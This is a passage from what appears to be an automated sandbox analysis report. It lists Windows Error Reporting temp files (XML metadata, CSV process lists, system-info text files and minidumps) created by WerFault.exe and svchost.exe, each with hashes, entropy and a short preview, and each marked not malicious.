File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8416
Entropy (8bit):	3.713068816530731
Encrypted:	false
SSDEEP:	192:R6l7wVeJQpL56A6YEIoSUhJgmfxWprw89bV+sf0gHm:R6lXJQF56A6YEnSUhJgmfx+V9f0
MD5:	F693A65681005566F950FB941022ED91
SHA1:	DB61AA7118CCBB3FD581D3E9B89A966152EA63F1
SHA-256:	5F23774FA3678AFD1E9C22ABA6011935246E06C5EC8A37A6A75EFE3C8ED5A228
SHA-512:	F8CFC24274E1A02022A07E47DDAAD056AC04D1C389A01C574ADDDCB68A5839CEDC5FD52E081A086470AB390B23219744446A4AF31ABD414665B9E6C72192C68D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD0C6.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4694
Entropy (8bit):	4.582445905029007
Encrypted:	false
SSDEEP:	48:cvIwWl8zs5Jg77aI9orWpW8VYegPYm8M4JogFel8+q8flRogM2Td:uIjfLI7Ga7VOSJs8wRoR2Td
MD5:	846011C1EED8715FF99D29A805A05411
SHA1:	9D91CAC4015C90791A1AF09DECE3E90E02AC4159
SHA-256:	BE0B83F251461BC68F8A7B795D93848652EF890087B271AAEAEFBFF77D4B61B5
SHA-512:	2AACA7352AD5FABB66AF1DCCB277A2978E2ACE96A4F9EF9740A32D320D54DABA1B8EA88DCD1BE3EE1B42EA0A49756209B3A6CCDA8D77876AF86D11006F37BFAF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="468465" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD0E4.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	85174
Entropy (8bit):	3.108147589138074
Encrypted:	false
SSDEEP:	768:ycDXI5qiz7odeRHSvFCWl23djuGT0FFp17n4vr2FYRQfllm9S1d:fD45xn4eRHrWl3k0FFp1mrpQn1d
MD5:	F16CB993CA7D3B531ACF596998F14199
SHA1:	F7C4FF124181D373B7FD60CDEDAA20CEF9B8B593
SHA-256:	B8807ADF69C237449A95A3AFA9BEEB9022BD818910B7DF48742ABFFCC785D96F
SHA-512:	F75848E124D3A72A65DBFDEA7F0B235032931FF70D6C865F48145932E69D6D981780DC1EDABD05D8E08EB87534C97673A346F32F181BC2A11D7B41200A2AB781
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD143.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.684653686857144
Encrypted:	false
SSDEEP:	96:TiZYWfDLAfCIYSYrWyHS7YEZcptFig3lXxlwaRKYaY5KM7fEIZj3:2ZDfVI1oDl8YaY5KM7fzZj3
MD5:	8FF57EEF08161E8D5EE7394016BF62DB
SHA1:	1E35057B7DC71324EFC80C9A25D3548DDBC95841
SHA-256:	46F2F337AEE020B61F1D1641837DF627F9A19241C867C02426676857ED4171AB
SHA-512:	8FB2E4EF488D04C37A28A503D61A7E6FE2412CE13FEF123E4A4711B3878FFC58E51D890C96AA6CE1E2464DE334F62BAC4BEEFBAA1763B6CC9F704D29D438F313
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1D0.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.683672338612151
Encrypted:	false
SSDEEP:	96:TiZYWywY7KCNuYcYFzWrHScYEZ7XtFi53qXaA5wjjgaL5ZMcf/Ikj3:2ZDWFNurIooAY8aL5ZMcfQkj3
MD5:	70E34D3F412A4120C1D712C3BC54825A
SHA1:	7DFC4D8A02076DF4969C5C09D0C6ACEC996FA587
SHA-256:	A502B4AEB7FF2B78ADBACCE4AF709BA35D17892FFEB9FBD75F0A23A72A508D3E
SHA-512:	7B873EB05E9AAC0D85A7C23C3E3DA5AAF63B2B7383A18C6F8B8D1C718DE34E660888911FA698E752D9E2220A1AB3443C58E1CF222ADA6A9EF09BF99F5C23BE72
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD586.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 23 16:42:49 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	254182
Entropy (8bit):	1.7535079396359232
Encrypted:	false
SSDEEP:	768:uKCjTLYs3kHgEVyAD2/4cEFJC60Ex9G7KwHH:uKWTEAzADvc+JKEx9G7KwH
MD5:	8BBA618CB2771E2FFCA85443787BF9EC
SHA1:	F63A80DB3FEFAF834445291346B453ECA7AF2936
SHA-256:	FE9F32651EC42EB546A7DB138DAC6FDB1419D83E8564C045408FB0CD9EC3C852
SHA-512:	5533A8E00BEA0BA1FF6E585D40ABEC888C5747A2D4CEF0688E8DE50124F87BD25E5AEBF50B07D6DC123FDDF3BD09190467CB3B4DCE2D717B48DCA6A8E4BC5651
Malicious:	false
Preview:	MDMP..a..... ..........f........................\|...............,y..........T.......8...........T............K..6...........h$..........T&..............................................................................eJ.......&......GenuineIntel............T.......D.....f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD9BD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8424
Entropy (8bit):	3.7135304672699436
Encrypted:	false
SSDEEP:	192:R6l7wVeJ+26e8DJV6YEINSUuiQgmfxWprq89bL5sf0TZm:R6lXJn6DDr6YECSUuiQgmfxALSfZ
MD5:	30233FA0A9ED8284C1C51D19D936C1ED
SHA1:	7ECFB9F922F9EFB04A1B2B47992A12EAF74F9D30
SHA-256:	3AFB166B13CA0EE1DF5636E63249AA96B2AC882C698B3B0855255BAF995E049A
SHA-512:	607A9523443269051385AC9D61B94AF7C4084A72973AAF1DD91EC3243AED6510141D5550EA8AC8BB728D6C341945B2C5885D5362B73707EFC4F87797504DE470
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.8.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD9DE.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4694
Entropy (8bit):	4.580551898212293
Encrypted:	false
SSDEEP:	48:cvIwWl8zs5Jg77aI9orWpW8VYe4Ym8M4JogFc+q8f5RogM2Id:uIjfLI7Ga7VnJQQRoR2Id
MD5:	E7C22BA733B2631597E6CAE136B32CB9
SHA1:	6809A0647EE87D76768BE07DC556D9FD5935B67F
SHA-256:	D1635BAFFDEA3D6676D8B825F20A843C000029974488F2F42A6C0415A402F993
SHA-512:	7521174F65C729FE5C2F2812CEC58501254FF69E73757038E9516A844E23F59D11C19731FF992D06FE8F02011333D39256FC6A349288C78A071F7DC761063D08
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="468465" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD9FF.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	87300
Entropy (8bit):	3.1062576534479414
Encrypted:	false
SSDEEP:	1536:K0lV+8EohiZjRkWqo0uwpT3rQQViIXX2x:K0lV+8EohiZjRkWqo0uwpT3rQgiIXX2x
MD5:	5BAF1FCA45A400205CDEF21AAD8F69B7
SHA1:	83522EB3FC810505EBA30AB736F297C74B8FBA5E
SHA-256:	BF3E5EE9DD9113495444907F1808074ED11A79200B7EF18049383C661F460427
SHA-512:	6454482BED6503945A0AE186043E99C325CE26D49C97D4A3853E5D395B0CC9AEF21069BBC88B480FC2CE3CE0E844FA7CADE9A3327A711282AC99294DAD3E8098
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDA1A.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 23 16:42:50 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	110030
Entropy (8bit):	1.694636545160793
Encrypted:	false
SSDEEP:	384:ilO7tPVTstpfdmno0IiyCGISlnxQrSs+lBSqxq0mataHN:QcttTspmnCaV+lBSqt3Yt
MD5:	ED5C82750A3A63834CF2C6899CD0375A
SHA1:	B8DC98BDC25317260B714DFDBBD063649F1FC668
SHA-256:	401FBBD4507DFA8164B0ADDC6FF0F5D8A7D5D1E24B7B33FEC980198CFAE5F038
SHA-512:	A53943C08586FFF5AA14FDD775E12D23851BBA3AAF61A53615E1C644AF086971591299A164A7AB2C95333EE702E9BD2DA86B6F60C87D4FB8C7EA4DBD2DEA569C
Malicious:	false
Preview:	MDMP..a..... ..........f............D...........D...L............J..........T.......8...........T...........8(..........................\|...............................................................................eJ....... ......GenuineIntel............T.............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDACB.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.684392129429231
Encrypted:	false
SSDEEP:	96:TiZYWJ9xjdYUYcWO/HSJYEZvVtFiq3/XxA5wM5uraQ5QDMwfj0I2j3:2ZDDTyrA3caQ5MMwfjj2j3
MD5:	2863C3F2D7A99B6B40C2CB24FEEFC1B8
SHA1:	9710A726C8A32A10ADE758B135F492831115960E
SHA-256:	9B1CEE24A495B2C1EFF217D2E5593C006E0762D8CF8050FE747246FFA1F1DA19
SHA-512:	40B2D91269B2D857747118C4267ECFC6931824C97136B7E948EE7C3AB3EB6C1004A50EF708F228C0DEE20A9DF2690EEDA6F617F70E1F8F9C1067D068D3EFDFF8
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB06.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8418
Entropy (8bit):	3.713296899640381
Encrypted:	false
SSDEEP:	192:R6l7wVeJcV6O6YEIuSUuiQgmfxWpri89bLysflBZm:R6lXJm6O6YERSUuiQgmfxwLxflO
MD5:	EDF2C35BC552531F274B4FFADF036AD9
SHA1:	C8158D6917EF191E710131325FF1B9EEAE4F243D
SHA-256:	DAB215D5DD995BB5A62014D1970AA4D4345287DC12D3E49658B008D171059CD6
SHA-512:	7013F93B5D065425DD6B0E42BA13E47379AFA380CD13DF04B9550762DD85D8FCF8A19B822B829DF3380D6EE062AB11A34ED6B5F9D7700049DDBCFFA4121A265A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB35.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4694
Entropy (8bit):	4.5847374426976115
Encrypted:	false
SSDEEP:	48:cvIwWl8zs5Jg77aI9orWpW8VYeL0Ym8M4JogFc+q8f/CdRogM25d:uIjfLI7Ga7VjJgDRoR25d
MD5:	4ED96B673168D443FEC0F3E57A958C00
SHA1:	801A58C3CBE125CA024A1B1D8F1B19A825B6AC83
SHA-256:	FE82557FC70C0252293EDBCC087414C370E5F415220674AAC978D758F78A3BF0
SHA-512:	43F1A27D323D280BAB6D23D20FEA8159EA6C3567C9EABF4BF485B3A54D1DE2234BC96C6F3EA1DF639F6473CBBE954F3BEA477E4C9BC601C2DDAEB0284978F43D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="468465" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB78.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	87324
Entropy (8bit):	3.1060302790301235
Encrypted:	false
SSDEEP:	1536:POVtd6v/P2rR4WGN0uwpT+rZQRqAIXYdE:POVtd6v/P2rR4WGN0uwpT+rZ8qAIXYdE
MD5:	0EB5449B0C125BB707AA6238A7C49839
SHA1:	DC9B47297E15616ADE1D53E3C9BDCA2C391D92BC
SHA-256:	E85A1FA6E1D1576ABB1A272C5DE70186C78126AB0ED7936D0D513A2D532735AD
SHA-512:	35FBE4C13B227B024AD77091A33E1E7700A3F297FE1A00E0DD1F13124C442893E9AB54824C939A18CA66E6C8399A1CED2EE33B2F7DA047D859DA38CF8C66EE89
Malicious:	false
